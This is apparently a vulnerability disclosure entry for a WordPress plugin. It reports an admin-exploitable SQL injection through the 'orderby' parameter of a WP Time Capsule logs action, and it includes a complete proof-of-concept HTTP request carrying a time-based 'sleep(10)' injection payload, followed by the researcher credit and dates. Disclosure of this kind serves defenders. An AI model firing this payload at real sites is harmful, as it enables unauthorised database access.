The plugin does not validate the orderby and order parameter before using them in a SQL statement, leading to an SQL injection exploitable by high privilege users such as admin when the Backup and Staging by WP Time Capsule plugin is installed
POST / HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 483 mainwpsignature=si0XH%2BJ%2FLqjlNIbCTuG06uNC%2FNKuv4izJ0lvzYB7bMbNGdRz4un1XDVNMXtblqNeqqF42L1ULDtBhDzGSDgF48RXB5RD4txw9psh3umFdCQYutoFT%2BiluMKxKFUim5L%2Fl3eRTBWIPk4tjNc06amtYzHcwKctIQEzwmnMEtowqK%2BNJmaEQjho185hAtX5rm9QYQmfupIYXHl8pNfPH910x2XMqmuZGWQI%2FC0KwkG%2BfapYWJUWhsTlaBwX7fINW9U7JLvHOr7dN2E80q6wattMEnS%2Fq0pmhCg6mG9Zpq9Q1kIgHP25UJSVkRdBAfcdun4lKPq9pcxmcNVUHcfkWBnkSA%3D%3D&nonce=1111&nossl=0&function=time_capsule&mwp_action=get_logs_rows&orderby=1+and+sleep(10)--+-&order=
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2021-10-25 (about 1 years ago)
2021-10-25 (about 1 years ago)
2022-09-26 (about 5 months ago)